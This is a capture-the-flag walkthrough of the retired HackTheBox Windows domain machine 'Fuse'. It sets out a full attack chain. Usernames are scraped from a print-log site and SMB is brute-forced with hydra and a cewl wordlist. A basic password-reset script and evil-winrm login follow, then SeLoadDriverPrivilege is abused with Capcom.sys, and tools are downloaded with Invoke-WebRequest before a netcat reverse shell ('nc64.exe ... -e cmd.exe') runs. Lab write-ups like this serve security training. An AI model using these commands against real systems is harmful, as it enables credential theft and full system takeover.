HackTheBox - Retired - Fuse

HackTheBox - Retired - Fuse

Recon

So in a bit of a change up from my normal routine instead of nmap directly I tried a new mutli-threaded scanning tool named threader-3000. It does the scan very fast

------------------------------------------------------------         Threader 3000 - Multi-threaded Port Scanner                                Version 1.0.6                                      A project by The Mayor               ------------------------------------------------------------ Enter your target IP address or URL here: 10.10.10.193 ------------------------------------------------------------ Scanning target 10.10.10.193 Time started: 2020-07-22 18:07:15.447558 ------------------------------------------------------------ Port 53 is open Port 80 is open Port 88 is open Port 135 is open Port 139 is open Port 389 is open Port 445 is open Port 464 is open Port 593 is open Port 636 is open Port 3269 is open Port 3268 is open Port 5985 is open Port 9389 is open Port 49666 is open Port 49667 is open Port 49675 is open Port 49680 is open Port 49676 is open Port 49698 is open Port 49751 is open Port scan completed in 0:01:39.547272

As you can see it did the initial scan in just under 2 minutes which is way faster than just nmap by itself and then based on those ports it suggests another nmap scan against what it found on the open ports.

Threader300 suggested this nmap scan that I than ran

nmap -p53,80,88,135,139,389,445,464,593,636,3269,3268,5985,9389,49666,49667,49675,49680,49676,49698,49751 -sV -sC -T4 -Pn -oA 10.10.10.193 10.10.10.193

The results

Host is up (0.091s latency). PORT      STATE SERVICE      VERSION 53/tcp    open  domain? | fingerprint-strings: |   DNSVersionBindReqTCP: |     version |_    bind 80/tcp    open  http         Microsoft IIS httpd 10.0 | http-methods: |_  Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Site doesn't have a title (text/html). 88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-07-22 22:24:39Z) 135/tcp   open  msrpc        Microsoft Windows RPC 139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn 389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name) 445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP) 464/tcp   open  kpasswd5? 593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0 636/tcp   open  tcpwrapped 3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name) 3269/tcp  open  tcpwrapped 5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp  open  mc-nmf       .NET Message Framing 49666/tcp open  msrpc        Microsoft Windows RPC 49667/tcp open  msrpc        Microsoft Windows RPC 49675/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0 49676/tcp open  msrpc        Microsoft Windows RPC 49680/tcp open  msrpc        Microsoft Windows RPC 49698/tcp open  msrpc        Microsoft Windows RPC 49751/tcp open  msrpc        Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=7/22%Time=5F18B90F%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 2h35m26s, deviation: 4h02m31s, median: 15m24s | smb-os-discovery: |   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) |   Computer name: Fuse |   NetBIOS computer name: FUSE\x00 |   Domain name: fabricorp.local |   Forest name: fabricorp.local |   FQDN: Fuse.fabricorp.local |_  System time: 2020-07-22T15:27:01-07:00 | smb-security-mode: |   account_used: guest |   authentication_level: user |   challenge_response: supported |_  message_signing: required | smb2-security-mode: |   2.02: |_    Message signing enabled and required | smb2-time: |   date: 2020-07-22T22:26:59 |_  start_date: 2020-07-22T21:58:19 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 305.14 seconds

So this definitely looks like a windows box we see 

Dns, smb,kerberos,ldap, http, wsman so maybe even a domain controller

Lets start poking around and see if we can see anything interesting.

No anonymous smb shares

Well port 80 gave us a bit more info.

When I tired to pull up fuse.htb it tried to redirect to fuse.fabricorp.local which would resolve so I added it to my /etc/hosts and got this.

Some sort of print logging software, we can’t see what exactly was printed but we can get some data leak here about users names and infrastructure.

For example on this page which is the first date listed 29-May-2020

So it looks like this org uses first initial last name for users and we can see these users

Pmerton Tlavel Nielsen

And we can see a couple of computer names which might or might not be helpful

Jump01 LONWK015

I grabbed all this info down because it has the potential to be useful.

Usernames: Pmerton tlavel bneilsen sThompson Bhult Administrator

Clients Jump01 LONWK015 LONWK019 LAPTOP07 FUSE

Based on the title of the documents it looks like nielsen might be a new account

And travel and thompson are probably members of the IT Department.

I started a hydra scan against bnielson with rockout.txt against smb but didn’t seem to be having any luck so I thought we might run cewl against the site and get any words longer than 4 characters to make a new password list from

Cewl http://fuse.fabircorp.local/papercut/logs/html -w /home/circusmonkey/Desktop/HTB/fuse/cewl.txt -d 10 -m4 --with-numbers

So this will scan the website upto 10 directories deep and grab any words longer than 4 characters and include ones that have numbers… you know just in case there is a password with numbers saved in here somewhere.

The resulting list was 146 words so I made a users.txt out of the usernames we found.

And through that to hydra

hydra -L /home/circusmonkey/Desktop/HTB/fuse/users.txt -P /home/circusmonkey/Desktop/HTB/fuse/cewl.txt 10.10.10.193 smb -V -o /home/circusmonkey/Desktop/HTB/fuse/hydra.txt

So here we are giving the list of username we saw to hydra and the list of words found on the website to be possible passwords and writing the output of found passwords to a file named hydra.txt in my working folder

Two password found!!!!

Exploit

Travel and bhult both have Fabricorp01 for their passwords…. 

Where on the site was that password? It was the name of one of the documents printed

Ok we have a creds so now we get further in our enumeration YAY!!

Lets see if we can see anything with smbclient now

Password must change huh?

Ok how do we do that?

https://serverfault.com/questions/215983/change-windows-ad-password-from-linux

smbpasswd -U <user> -r <IP address of DC>

Ok so we can do 

Smbpassd -U bholt -r fuse.htb

And

Smbpassd -U travel -r fuse.htb  ???

I first tried to set the same password

It didn’t like that ok so I’ll do something else from the site so if someone else is trying this box hopefully it won’t screw them up.

I’ll do  LONWK019

Well it didn’t like that one either it might be too short… I’m sorry other users on the box right now :)

I ended up using Fabricorp02

I did the same for bhult  lets see if we get any smb shares now

So we get 

Admin$ c$ HP-MFT01 IPC$ NETLOGON print$ SYSVOL

I know the $ shares will only work if he is a administrator on the computer but I’ll try those first

No luck with any of the shares

Ok pretty quickly I realized the machine is resetting the password back to Fabricorp01 fairly quickly…. Like 20 seconds after its changed so damint..

I”m going to need to script this (Very basic python skills means very basic scripting)

Ok after some trial and error I was able to do this quickly enough to get and RPC sessions.

Here is my super basic script, I would just copy the new password to my clipboard and immediately after the script ran try to connect up to rpc using 

rpcclient -U fabricorp\\tlavel -r 10.10.10.193

import os orgpasswd = "Fabricorp01" newpasswd = "15615eF1111" cmd1 = "(echo "+ orgpasswd+"; echo " +newpasswd+";echo "+newpasswd +") | smbpasswd -U tlavel -r fuse.htb" #cmd2 = "enum4linux -a -u tlavel -p " +newpasswd+" -r fuse.htb" #cmd3 = "echo " +newpasswd+" | rpcclient -U Fabricorp\\\\tlavel  fuse.htb" print("changing tlavel") os.system(cmd1) #os.system(cmd3)

I grab the users on the machine using enumdomusers

rpcclient $> enumdomusers user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[svc-print] rid:[0x450] user:[bnielson] rid:[0x451] user:[sthompson] rid:[0x641] user:[tlavel] rid:[0x642] user:[pmerton] rid:[0x643] user:[svc-scan] rid:[0x645] user:[bhult] rid:[0x1bbd] user:[dandrews] rid:[0x1bbe] user:[mberbatov] rid:[0x1db1] user:[astein] rid:[0x1db2] user:[dmuir] rid:[0x1db3]

And the groups using enumdomgroups

rpcclient $> enumdomgroups group:[Enterprise Read-only Domain Controllers] rid:[0x1f2] group:[Domain Admins] rid:[0x200] group:[Domain Users] rid:[0x201] group:[Domain Guests] rid:[0x202] group:[Domain Computers] rid:[0x203] group:[Domain Controllers] rid:[0x204] group:[Schema Admins] rid:[0x206] group:[Enterprise Admins] rid:[0x207] group:[Group Policy Creator Owners] rid:[0x208] group:[Read-only Domain Controllers] rid:[0x209] group:[Cloneable Domain Controllers] rid:[0x20a] group:[Protected Users] rid:[0x20d] group:[Key Admins] rid:[0x20e] group:[Enterprise Key Admins] rid:[0x20f] group:[DnsUpdateProxy] rid:[0x44e] group:[IT_Accounts] rid:[0x644]

And here is why some of the password I tried didn’t work when resetting

rpcclient $> getdompwinfo min_password_length: 7 password_properties: 0x00000001         DOMAIN_PASSWORD_COMPLEX

Password complexity is on.. I figured this out during testing anyway but good to have confirmation.

I’m now going to query each user to see if there is anything interesting in their accounts, sometimes creds are stored in here.

Nothing in the description fields for any of the user accounts…

But this machine is running as a print logging server and possibly a print server.

I tried 

Enumprinters and got this output

rpcclient $> enumprinters         flags:[0x800000]         name:[\\10.10.10.193\HP-MFT01]         description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]         Comment:[]

Oooohhhh that looks like a password for service account    $fab@s3Rv1ce$1

There were only two account names that looked like service accounts 

Svc-print

Svc-scan

If I were I were to be I’d bet on svc-print so I fired that up with evil-winrm

evil-winrm -i 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1'

And we can get the user.txt

Now lets figure out a way to escalate…..

There is an interesting readme.txt in the root of C:

// MFT printing format issue

note to HP engineer:

The "test" directory has been created. For repeated tests while diagnosing this issue, the same folder should be used.

This is a production environment and the "solution" should be developed and confirmed working in your testbed

All changes will be reverted every 2 mins.

Let’s check our privs to see if we can escalate.

I got a bit a nudge to look here, and here is some privileges that aren’t normally given to non-admin users.  What is SeloadDriverPrivilege? Basically its the rights to load drivers onto systems…

I found this blog that I followed from here on out.

https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/

So we are going to load Capcom.sys on the system using our nice privileges  and then exploit it to do a reverse connection back to our computer 

So we need to compile a couple cpp files that are part of this blog.

EOPLOADDRIVER 

https://github.com/TarlogicSecurity/EoPLoadDriver/

ExploitCapcom from Tandasat 

 https://github.com/tandasat/ExploitCapcom

And the capcom.sys driver its self I got from

https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys

EOPLoadDrive just build the way it is

But we are going to have to modify ExploitCapcom

In the cpp it calls cmd.exe to spawn a new process which We aren’t going to be able to get to

So I made .bat file and pointed it to where it's going to be

My RShell.bat is just a call to netcat

C:\temp\circusmonkey\nc64.exe 10.10.14.13 5555 -e cmd.exe

Then compile ExploitCapcom.exe too

Now we need to move these files over to the fuse box.

I’m running the python module SImpleHTTPServer to serve the files up.

Invoke-WebRequest "http://10.10.14.13:8080/Capcom.sys" -OutFile "C:\temp\circusmonkey\Capcom.sys"  Invoke-WebRequest "http://10.10.14.13:8080/EOPLOADDRIVER.exe" -OutFile "C:\temp\circusmonkey\EOPLOADDRIVER.exe"  Invoke-WebRequest "http://10.10.14.13:8080/ExploitCapcom.exe" -OutFile "C:\temp\circusmonkey\ExploitCapcom.exe"  Invoke-WebRequest "http://10.10.14.13:8080/Rshell.bat" -OutFile "C:\temp\circusmonkey\Rshell.bat"  Invoke-WebRequest "http://10.10.14.13:8080/nc64.exe" -OutFile "C:\temp\circusmonkey\nc64.exe"

Ok first we need to load the driver with the EOPLOADDriver.exe 

On FUSE

EOPLOADDriver.exe System\CurrentControlSet\MyService C:\temp\circusmonkey\capcom.sys

Now I setup my listener on my kali box to hopefully catch the reverse shell

Nc -lnvp 5555

Now hopefully when we launch our exploit, it will spawn a process as SYSTEM, that will execute our RShell.bat which will talk back to our kali box.

annndddd?

We got our shell

From here we just type C:\users\Administrator\Desktop\root.txt